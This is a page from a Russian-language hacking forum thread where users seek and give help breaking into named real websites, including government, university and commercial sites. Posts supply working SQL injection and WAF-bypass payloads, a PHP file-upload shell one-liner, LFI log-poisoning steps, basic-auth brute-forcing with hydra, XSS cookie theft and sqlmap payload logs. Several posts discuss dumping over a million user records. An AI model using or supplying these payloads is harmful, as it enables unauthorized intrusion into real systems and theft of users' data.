Просмотр полной версии : Ваши вопросы по уязвимостям.
Страницы :
1
2
3
4
5
6
7
8
[
9]
10
11
12
kacergei said:
↑ (https://antichat.live/posts/4115204/)
Ранее с таким не сталкивался, потому вопрос может быть очень глупым
)))
Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый)
"cat > vda_image"
я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh
root@xxx.xxx.xxx.xx (mailto:root@xxx.xxx.xxx.xx)
-p22 "cat > /root/folder_on_my_computer/vda_image_file"
Я верно понял?
P.S> как узнать предположительный размер конечного файла?
Дабы решить на какую удаленную лить (место не резиновое =) )
Да, можно указать любой путь на удалённой машине. Судя по df -h /dev/vda1имеет размер 30G, образ будет такого же размера. Можно ещё попутно жатьgzip-ом, размер должен быть меньше.
BabaDook
11.08.2017, 20:08
Цветные, помогите
Code:
http://health.ri.gov/licenses/detail.php?id=248++1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15
BabaDook said:
↑ (https://antichat.live/posts/4115878/)
Цветные, помогите
Code:
http://health.ri.gov/licenses/detail.php?id=248++1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15
Code:
detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -
Как вариант вывести через ошибку БД, но не забывай заключать оператор select в /*!select*/, там на него ругается!
BabaDook
11.08.2017, 21:14
cat1vo said:
↑ (https://antichat.live/posts/4115906/)
Code:
detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -
Как вариант вывести через ошибку БД, но не забывай заключать оператор select в
/*!
select
*/
, там на него ругается!
Спасибо, а можешь любую таблицу вывести, а то я не оч понимаю этот синтекс, а так по твоему примеру буду пробовать разбираться. Спасибо.
cat1vo said:
↑ (https://antichat.live/posts/4115906/)
Code:
detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -
Как вариант вывести через ошибку БД, но не забывай заключать оператор select в
/*!
select
*/
, там на него ругается!
там всё что после /**/ как будто не уходит в запрос
?id=248/**/werwer - валидная страница
?id=248=0 group by mid(/*!select(version())*/,rand(0)|0)having min(0)-- - - запрос падает
Здравствуйте, я бы хотел узнать об XSS уязвимостях, а именно как их использовать, если стоит фильтр, просто алерт работает а вот более сложные скрипты со сниффером - фильтруются, и еще на счет сниффера, есть ли такие, которые работают, когда жертва просто видит картинку, и нажатия не требуется, я в этом плохо разбираюсь, также на счет шелка, есть ли беспалевные, просто на какой бы хостинг я бы не ставил, тут же блокируют, или шелл просто ее работает, может хостинги сеть, на которых они не садятся какие-то?
Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной
Что можно предпринять, что бы хоть как то заставить сливаться быстрее?
r1l said:
↑ (https://antichat.live/posts/4117050/)
Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной
Что можно предпринять, что бы хоть как то заставить сливаться быстрее?
А чем сливаешь?
Gorev said:
↑ (https://antichat.live/posts/4117057/)
А чем сливаешь?
sqlmap как и всегда
r1l said:
↑ (https://antichat.live/posts/4117050/)
Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной
Что можно предпринять, что бы хоть как то заставить сливаться быстрее?
DIOS - Dump In One Shot (https://defcon.ru/web-security/2320/)
cat1vo said:
↑ (https://antichat.live/posts/4117102/)
DIOS -
Dump In One Shot (https://defcon.ru/web-security/2320/)
для "Union Base"
у меня error base
да и если бы уязвимость была union я бы и мапом наверное в один клик слил
Может там шел можно как то залить, я ни разу этого не делал
Привет всем!
Сразу извините за тупой вопрос.
Мб я пишу не в ту тему. Вообщем проблема такова , есть сайт medstat.*uva.ru ( *t )который можно войти только через сеть поликлиники,а через любую другую сеть никак не могу вломиться,пробывал VPN,TOR,ПРОКСИ не помогает.
Как войти на этот сайт?
r1l said:
↑ (https://antichat.live/posts/4117086/)
sqlmap как и всегда
Количество потоков(хинт)
Ребят подскажите или помогите
1. есть сайт , на нем скуля Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) , в post запросе
2.Если начинать --dump , сыпятся куча ошибок и он не может сдампить даже пару строк (уменьшал увеличивал кол-во потоков ,делей ,запускал с ключом -o ) Все одно и тоже ,я думаю это из-за кол-во записей в таблице юзеров
3. Стал смотреть --is-dba , оказалось false
4. Чекнул Ip yf 3306 порт мускула ,но о5 же нет
5.Нашел таблицу с админами , нашел пасс мыло и нейм ,но пасс судя по всему расшифровке не подлежит ,так как $P$BpL/N0jM5uZ.rjNf.dQXCJEfZ.D0FN/ , засунул на cmd5 ,тоже тишина , но вроде как форму логина для админов нашел ,но это тоже ничего не дает
6. искал пхпмайадмин ,поиски ничего не дали
Задача сдампить
Вопрос: как ?)
С андройда при помощи csploit наловил трафика и сохранил в pcap . Юзнул Wireshark и с помощью фильтра: wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 || eapol
отделил от мусора .
Дальше в мануале было сказано запустить Elcomsoft Wireless Security Auditor закинуть наш отсортированный файл и атаковать .
Когда начинаю закидывать файл EWSA начинает ругаться , что файл либо не того формата либо в нем нет того что нужно .
Вопрос что же я делаю неправильно ? =(
Xsite said:
↑ (https://antichat.live/posts/4117972/)
Ребят подскажите или помогите
1. есть сайт , на нем скуля Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) , в post запросе
2.Если начинать --dump , сыпятся куча ошибок и он не может сдампить даже пару строк (уменьшал увеличивал кол-во потоков ,делей ,запускал с ключом -o ) Все одно и тоже ,я думаю это из-за кол-во записей в таблице юзеров
3. Стал смотреть --is-dba , оказалось false
4. Чекнул Ip yf 3306 порт мускула ,но о5 же нет
5.Нашел таблицу с админами , нашел пасс мыло и нейм ,но пасс судя по всему расшифровке не подлежит ,так как $P$BpL/N0jM5uZ.rjNf.dQXCJEfZ.D0FN/ , засунул на cmd5 ,тоже тишина , но вроде как форму логина для админов нашел ,но это тоже ничего не дает
6. искал пхпмайадмин ,поиски ничего не дали
Задача сдампить
Вопрос: как ?)
А попробуй всё руками сделать... SQLMAP показывает свои запросы.
karkajoi
19.08.2017, 16:39
Вот такая беда, мини шел работает, могу вывести phpinfo, но есть делаю запрос cmd=system('ls -la'); то выдает ощибку
Warning: system() has been disabled for security reasons
я так понял она выключена в php.ini
как можно обойти?
karkajoi said:
↑ (https://antichat.live/posts/4118816/)
Вот такая беда, мини шел работает, могу вывести phpinfo, но есть делаю запрос cmd=system('ls -la'); то выдает ощибку
Warning
: system() has been disabled for security reasons
я так понял она выключена в php.ini
как можно обойти?
shell_exec(), exec().
cat1vo said:
↑ (https://antichat.live/posts/4117102/)
DIOS -
Dump In One Shot (https://defcon.ru/web-security/2320/)
Быстрее ты задосишь сайт, чем сольешь его такой техникой такой объем данных
SooLFaa said:
↑ (https://antichat.live/posts/4119108/)
Быстрее ты задосишь сайт, чем сольешь его такой техникой такой объем данных
Если у сайта есть возможность держать и работать с таким объёмом данных, скорей всего пропускная способность чуть выше.
st55 said:
↑ (https://antichat.live/posts/4119146/)
Если у сайта есть возможность держать и работать с таким объёмом данных, скорей всего пропускная способность чуть выше.
Это проверено. DIOS делается рекурсивными зхапросами если бы ты посмотрел на запрос. И данные в миллион ты не выведешь, в лучшем случае упадешь по таймауту. А то сколько он может хранить это не зависит от мощности.
SooLFaa said:
↑ (https://antichat.live/posts/4119150/)
Это проверено. DIOS делается рекурсивными зхапросами если бы ты посмотрел на запрос. И данные в миллион ты не выведешь, в лучшем случае упадешь по таймауту. А то сколько он может хранить это не зависит от мощности.
В чем проблема сделать 100 запросов по 10к строк вывода? И ничего не упадет, на личном опыте сливал и куда больше строк через DIOS, но конечно не 1кк строк за раз (что за бред), а разбив на меньший объем, но у человека совсем другая ситуация!
cat1vo said:
↑ (https://antichat.live/posts/4119175/)
В чем проблема сделать 100 запросов по 10к строк вывода? И ничего не упадет, на личном опыте сливал и куда больше строк через DIOS, но конечно не 1кк строк за раз (что за бред), а разбив на меньший объем, но у человека совсем другая ситуация!
А вот это очень хорошее и грамотное дополнение...
А тут помогают раскрутить?
http://www.fcbahis.net//stats.php?listcount=1'"&month=2010-09&page=1&style=month&tipster=71 (http://www.fcbahis.net//stats.php?listcount=1%27%22&month=2010-09&page=1&style=month&tipster=71)
Нашел уязвимость, но как я только не пытался крутить.. бесполезно
параметр listcount
Или это обычная ошибка синтаксиса, а я голову ломаю?
Ребята, недавно на одном из пабликов узнал о дополнении Tamper Data. Есть ещё что-нибудь подобное?
Hedorda said:
↑ (https://antichat.live/posts/4119277/)
Ребята, недавно на одном из пабликов узнал о дополнении Tamper Data. Есть ещё что-нибудь подобное?
Да, Burp suite, ZAP proxy, Charles etc
DezMond™
22.08.2017, 14:57
Помогите вывод сделать, на фильтр не похоже..
Code:
https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'+order+by+57+--+
Shubka75
22.08.2017, 15:48
DezMond™ said:
↑ (https://antichat.live/posts/4119895/)
Помогите вывод сделать, на фильтр не похоже..
Code:
https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'+order+by+57+--+
Стоит ограничение на количество символов в переменной, так что крутить получится только как слепую
Code:
https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'or mid(database(),1,1)='t';%00
karkajoi said:
↑ (https://antichat.live/posts/4118816/)
Вот такая беда, мини шел работает, могу вывести phpinfo, но есть делаю запрос cmd=system('ls -la'); то выдает ощибку
Warning
: system() has been disabled for security reasons
я так понял она выключена в php.ini
как можно обойти?
Пробуй файл записать
Code:
cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=
z0mbie86
24.08.2017, 13:24
Извините если не в том разделе,
возникла проблема с Microsoft SQL Server/Sybase stacked queries (comment)
Дело в том, что я с помощью sqlmap вытаскиваю список баз, таблицы, текущий пользователь, но никак не получается вытащить колонки и инфу из таблиц.
На каждую таблицу sqlmap предлагает брутить колонки, а на инфу говорит что таблица содержит 0 строк (Колонки указывал вручную. т.к. знаю что в некоторых таблицах есть такая)
Направьте на путь истинный, подскажите методы решения.
Запрос sqlmap -r "file.txt" --random-agent --tor --time-sec=50 --dbms=MsSQL
DezMond™
28.08.2017, 23:23
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=176+select+union+111+--+
Злой waf так пускает, а как надо - хер! как обойти?
DezMond™ said:
↑ (https://antichat.live/posts/4122102/)
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=176+select+union+111+--+
Злой waf так пускает, а как надо - хер! как обойти?
Code:
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=-176+UniOn%0B/*hjh%0B%0Bijhi%0Bokihuygtfryujiko%0Biuytreftgyhuji k%0Bijuhygtfrderftgyhujik%0Bokijuhygtfrftgyhuji%0B iuytrftgyh%0B*/Select+%20version/*asd*/()+--+
@BabaDook (https://antichat.live/members/263150/) обошел Waf, но как я понял были проблемы с выводом версии и тд, не знаю почему не отписал сюда. Версию вывели, дальше сам!
Ergebnisse der Volltextsuche zu "5.5.27"
DezMond™
30.08.2017, 14:44
cat1vo said:
↑ (https://antichat.live/posts/4122429/)
Code:
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=-176+UniOn%0B/*hjh%0B%0Bijhi%0Bokihuygtfryujiko%0Biuytreftgyhuji k%0Bijuhygtfrderftgyhujik%0Bokijuhygtfrftgyhuji%0B iuytrftgyh%0B*/Select+%20version/*asd*/()+--+
@
BabaDook (https://antichat.live/members/263150/)
обошел Waf, но как я понял были проблемы с выводом версии и тд, не знаю почему не отписал сюда. Версию вывели, дальше сам!
Ergebnisse der Volltextsuche zu "
5.5.27
"
from фильтрует, пытался скрыть кодировкой,пробелами,комен тами, регистром, ни чё не помогает( может у кого то получится...
kacergei
31.08.2017, 21:35
Ребят кто сможет подсказать с этими двумя урлами
Ошибка есть
Но что только не пробовал глухо((
Code:
http://www[.]teraxpress[.]com/index.php?route=extension/module/merchant_profile&merchant_id=65
http://www[.]teraxpress[.]com/index.php?route=extension/module/merchantlogo/getStoreCategory&vpath=3&sort=pd.name&order=ASC&merchant_id=3&limit=25
Lesanglier
02.09.2017, 22:54
всем доброго времени.
на админке стоит http basic authentication
читал что можно перехватить login : password в формате base64
.SpoilerTarget" type="button">Spoiler
Code:
GET /administrator/ HTTP/1.1
Connection: keep-alive
Cache-Control: max-age=0
Authorization: Basic NDUzdDo1NHQ=
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,en-US;q=0.8,en;q=0.6
X-Compress: null
Cookie: ring=840b4f0c8e5d64ca6d2fe74dead87a4c; _ym_uid=1504109674995456289; city=25; region=104; visitor=e88e905cdaad3d67f0c6df4765c34a76c1e7d4eec4 a3cc8e44345b11c108c473; _ga=GA1.3.2065729496.1504109674; PHPSESSID=4o4ui8jeikerke04dmltqtdcp0; pastafarian=c4e5bfebfbbf5abeb2936bb31ec61403863880 55110b8debd270cbf7c755644d; winter=11457.59a6e778e6cd71.61786604; _ym_isad=1; _ga=GA1.2.2065729496.1504109674; _gid=GA1.2.994183403.1504355776
Authorization: Basic NDUzdDo1NHQ=
DezMond™
03.09.2017, 14:50
Code:
http://www.rgre.de/rgre-partnerschaften/index.php?dt_orgname=&dt_plz=&dt_einwohnerzahl_min=&dt_einwohnerzahl_max=&dt_bundesland=&aus_orgname=&aus_plz=&aus_kontinent=&partner_seit_von=&partner_seit_bis=&partner_form=&submit=Suche&aus_land=GR&order_by=land'
чёт туплю, не могу вывод сделать(
[QUOTE="Lesanglier"]
Lesanglier said:
↑ (https://antichat.live/posts/4123601/)
всем доброго времени.
на админке стоит http basic authentication
читал что можно перехватить login : password в формате base64
Spoiler
Code:
GET /administrator/ HTTP/1.1
Connection: keep-alive
Cache-Control: max-age=0
Authorization: Basic NDUzdDo1NHQ=
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,en-US;q=0.8,en;q=0.6
X-Compress: null
Cookie: ring=840b4f0c8e5d64ca6d2fe74dead87a4c; _ym_uid=1504109674995456289; city=25; region=104; visitor=e88e905cdaad3d67f0c6df4765c34a76c1e7d4eec4 a3cc8e44345b11c108c473; _ga=GA1.3.2065729496.1504109674; PHPSESSID=4o4ui8jeikerke04dmltqtdcp0; pastafarian=c4e5bfebfbbf5abeb2936bb31ec61403863880 55110b8debd270cbf7c755644d; winter=11457.59a6e778e6cd71.61786604; _ym_isad=1; _ga=GA1.2.2065729496.1504109674; _gid=GA1.2.994183403.1504355776
Authorization: Basic NDUzdDo1NHQ=
Lesanglier
04.09.2017, 18:40
SooLFaa said:
↑ (https://antichat.live/posts/4123916/)
Абсолютно верно. Логин и пароль указаны в кодировке base64. По поводу перехватить - если ты не в одной сети с жервтой будет сложно. Зато брутится очень легко.
burp справится хорошо или лучше другим софтом?
Lesanglier said:
↑ (https://antichat.live/posts/4124135/)
burp справится хорошо или лучше другим софтом?
Я гидрой бручу basic. Но у меня то сервер. А так на вкус и цвет.
BabaDook
08.09.2017, 14:38
DezMond™ said:
↑ (https://antichat.live/posts/4123720/)
Code:
http://www.rgre.de/rgre-partnerschaften/index.php?dt_orgname=&dt_plz=&dt_einwohnerzahl_min=&dt_einwohnerzahl_max=&dt_bundesland=&aus_orgname=&aus_plz=&aus_kontinent=&partner_seit_von=&partner_seit_bis=&partner_form=&submit=Suche&aus_land=GR&order_by=land'
чёт туплю, не могу вывод сделать(
Я не виду там инъекции. Может я тоже туплю. Кидай ещё сайты
Code:
http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf
фильтр на _
Как обойти?
принципиально важно обойти именно в нем ограничение
DezMond™
09.09.2017, 17:38
preno said:
↑ (https://antichat.live/posts/4126012/)
Code:
http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf
фильтр на _
Как обойти?
принципиально важно обойти именно в нем ограничение
%255F
preno said:
↑ (https://antichat.live/posts/4126012/)
Code:
http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf
фильтр на _
Как обойти?
принципиально важно обойти именно в нем ограничение
DezMond™ said:
↑ (https://antichat.live/posts/4126047/)
%255F
хотелось бы на конкретном примере. у меня не получается
DezMond™
09.09.2017, 18:39
Code:
http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf%255F
DezMond™ said:
↑ (https://antichat.live/posts/4126066/)
Code:
http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf%255F
Получаем %5F
SQL не крутится
Тот_самый_Щуп
09.09.2017, 18:48
DezMond™ (https://antichat.live/members/47856/), учи матчасть про двойной urlencode, потом советуй.
foozzione
15.09.2017, 18:53
на сайте с wordpress есть плашин старый с вулном - https://www.exploit-db.com/exploits/36414/
Немного не понял как реализовать например sql inj, никто не сталкивался? Мб и я туплю.
За помощь в реализации, готов отблагоодарить хорошо
winstrool
15.09.2017, 19:20
foozzione said:
↑ (https://antichat.live/posts/4128489/)
на сайте с wordpress есть плашин старый с вулном -
https://www.exploit-db.com/exploits/36414/
Немного не понял как реализовать например sql inj, никто не сталкивался? Мб и я туплю.
За помощь в реализации, готов отблагоодарить хорошо
Вместо your.wordpress.blog ставите адрес своего сайта, но не плохо было бы, сначало чекнуть сайт на уязвимость хотя бы наличием той же Reflected XSS
foozzione
15.09.2017, 19:59
winstrool said:
↑ (https://antichat.live/posts/4128499/)
Вместо your.wordpress.blog ставите адрес своего сайта, но не плохо было бы, сначало чекнуть сайт на уязвимость хотя бы наличием той же Reflected XSS
тут я понял, что адрес то нужен свой,дело в том, что плагин есть и он уязвим, а вот как грамотно чекнуть, тут проблема. По этому прошу помощи.
winstrool
15.09.2017, 20:46
foozzione said:
↑ (https://antichat.live/posts/4128522/)
тут я понял, что адрес то нужен свой,дело в том, что плагин есть и он уязвим, а вот как грамотно чекнуть, тут проблема. По этому прошу помощи.
Парсите тело ответа
foozzione
15.09.2017, 20:49
winstrool said:
↑ (https://antichat.live/posts/4128548/)
Парсите тело ответа
то есть в случае с Reflected XSS via HTTP referer,я должен отправить похожую форму:
HTML:
с реферером: ?lang=en">alert("hello");
Но, на сайте как я понял у них есть реврайт, язык переключается просто site.ru/en, а при попытке ?lang=en ведет на страницу с новостями/постами...
Octavian
18.09.2017, 02:39
Mozilla выдает
Code:
Apple
Burp выдает
Code:
alert(1)abys9=1&sb=88">Apple
Я так понимаю мешает URL ENCODE как эксплуатируется?
Octavian said:
↑ (https://antichat.live/posts/4129292/)
Я так понимаю мешает URL ENCODE как эксплуатируется?
Internet Explorer
foozzione said:
↑ (https://antichat.live/posts/4128551/)
Но, на сайте как я понял у них есть реврайт, язык переключается просто site.ru/en, а при попытке ?lang=en ведет на страницу с новостями/постами...
Если рефер не чекается, то отправить можно со своего хоста.
foozzione
19.09.2017, 20:48
crlf said:
↑ (https://antichat.live/posts/4130023/)
Internet Explorer
Если рефер не чекается, то отправить можно со своего хоста.
Искусственно поставить рефер?
foozzione said:
↑ (https://antichat.live/posts/4130034/)
Искусственно поставить рефер?
С подготовленной страницы перенаправить.
Octavian
19.09.2017, 22:38
crlf said:
↑ (https://antichat.live/posts/4130023/)
Internet Explorer
Если рефер не чекается, то отправить можно со своего хоста.
Типа URL ENCODE explorerне делает
Octavian said:
↑ (https://antichat.live/posts/4130074/)
Типа URL ENCODE explorerне делает
типа да, не энкодит
Octavian
19.09.2017, 22:43
crlf said:
↑ (https://antichat.live/posts/4130076/)
типа да, не энкодит
А в MOZILLA?
Octavian said:
↑ (https://antichat.live/posts/4130078/)
А в MOZILLA?
А в мозилла энкодит и ничего с этим не поделаешь!
Octavian
19.09.2017, 22:47
crlf said:
↑ (https://antichat.live/posts/4130079/)
А в мозилла энкодит и ничего с этим не поделаешь!
Почему это делается в даном случае ? ведь есть работающие GET XSS в Chrome, Mozilla
Octavian said:
↑ (https://antichat.live/posts/4130083/)
Почему это делается в даном случае ? ведь есть работающие GET XSS в Chrome, Mozilla
https://security.elarlang.eu/request-uri-query-string-and-url-encoding.html
billybonse
20.09.2017, 21:39
Привет всем читающим.
Нужна помощь. (Сразу извиняюсь, если задаю глупый вопрос)
Нашел lfi, пытаюсь раскрутить.
/proc/self/environ не работает
cmdline - /usr/sbin/httpd
В httpd.conf:
httpd.conf - ErrorLog logs/error_log
Перебирал различные пути, не нашел
Попробовал так (https://antichat.live/threads/232773/):
GET /epicfaaaaaail.php?
Обращаюсь - /proc/self/fd/8%00&cmd=ls%00
Выдает что-то странное:
PHP Fatal error: Call to undefined function: getsubtitle() in /local/.../index.php on line 20
[error] [client x.x.x.x] File does not exist: /local/.../robots.txt
[error] [client x.x.x.x] File does not exist: /local/.../nonlinear
[error] [client x.x.x.x] File does not exist: /local/.../nonlinear
PHP Fatal error: Call to undefined function: getsubtitle() in /local/.../index.php on line 20
В каком направлении копать?
billybonse said:
↑ (https://antichat.live/posts/4130417/)
GET /epicfaaaaaail.php?
Пейлод нужно в юзерагенте передавать. Так же, можно попробовать подцепить сессию и посмотреть что туда можно загнать.
https://rdot.org/forum/showthread.php?t=343 много полезной инфы на тему.
billybonse said:
↑ (https://antichat.live/posts/4130417/)
cmd=ls%00
Нулл байт не нужен.
billybonse
20.09.2017, 23:18
crlf said:
↑ (https://antichat.live/posts/4130438/)
Пейлод нужно в юзерагенте передавать
В соседней статье (https://antichat.live/threads/232773/):
"Ты пишешь мини шелл: , кодируешь всё в url, составляешь и отправляешь пакет:
POST httр://localhost/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5 D%29%3F%3E HTTP/1.1
Host: localhost
А кто? Кто это сделал? Сервер, приняв и обработав запрос, выдает 404 ошибку (о несуществующей страницы epicfaaaaaail.php), и записал это в error_log, выглядеть на сервере это стало так:
Code:
127.0.0.1 - [29/Sep/2010:13:55:36 -0700] "GET /epicfaaaaaail.php? HTTP/1.1" 404 2326
т.е. получается, обратившись к этому логу, PHP интерпретатор обработает всё докак обычный текст, а значит всё, шелл есть. Ты обращаешься к error_log: httр://localhost/?page=../../../etc/httpd/log/error_log&cmd=phpinfo();die(); и ничуть не удивившись видишь результат выполнения phpinfo()."
Для сессии нужна рега, если я не ошибаюсь, которой здесь нет.
billybonse said:
↑ (https://antichat.live/posts/4130452/)
В
соседней статье (https://antichat.live/threads/232773/)
:
Статью нужно перечитать ещё раз и подробно изучить тему по ссылке, которую я дал выше. У вас получилась мешанина из методов эксплуатации (procfs != логи).
billybonse said:
↑ (https://antichat.live/posts/4130452/)
Для сессии нужна рега, если я не ошибаюсь, которой здесь нет.
Не обязательно.
Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php
На другой БД, в каталоге /blog/ крутиться worpdress.
Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)
Могу дать доступ, и если поможете - отблагодарю чисто символически.
Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...
Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?
Muracha said:
↑ (https://antichat.live/posts/4132330/)
Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php
На другой БД, в каталоге /blog/ крутиться worpdress.
Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)
Могу дать доступ, и если поможете - отблагодарю чисто символически.
Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...
Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?
Посмотри в сторону load data local infile
blackbox
27.09.2017, 23:43
Muracha said:
↑ (https://antichat.live/posts/4132330/)
Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php
На другой БД, в каталоге /blog/ крутиться worpdress.
Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)
Могу дать доступ, и если поможете - отблагодарю чисто символически.
Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...
Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?
Тебе уже ответили https://dev.mysql.com/doc/refman/5.7/en/load-data.html но тут нужно знать полный путь к файлу, поэтому нужна еще ошибка раскрытия путей, с галереей может не получится, нужно смотреть каким образом она отображает картинку, скорее всего там будет проверка на то является ли файл корректным изображением. Если ты можешь встраивать JS в страницу, то можно попробовать угнать куки администратора сайта, правда я не знаю как там в Wordpess с этим дела обстоят сейчас.
WallHack
07.10.2017, 11:52
Была уязвимость error based, так крутил: seo-fast.ru/news'or(extractvalue(null,concat(0x3a,substr(load_ file(0x2f6574632f706173737764),-30,30))))=
Сейчас вывод ошибок отключен, но думаю там сейчас time based blind, помогите проверить.
slipknot13
14.10.2017, 20:36
как таблицы открыть
[19:41:45] [INFO] fetching current database
[19:41:45] [INFO] fetching tables for database: 'имя базы'
[19:41:45] [INFO] fetching number of tables for database 'имя базы'
[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>66
[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>52
[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>48
[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>1
[19:41:47] [INFO] retrieved:
[19:41:47] [DEBUG] performed 4 queries in 1.62 seconds
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>66),SLEEP(10),9830)
[19:41:47] [WARNING] (case) time-based comparison requires larger statistical mo
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>170454),SLEEP(10),9830)
.
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>819325),SLEEP(10),9830)
.
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>261031),SLEEP(10),9830)
.
[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>164592),SLEEP(10),9830)
.
[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>160487),SLEEP(10),9830)
.
[19:41:49] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>871054),SLEEP(10),9830)
.
[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>913561),SLEEP(10),9830)
.
[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
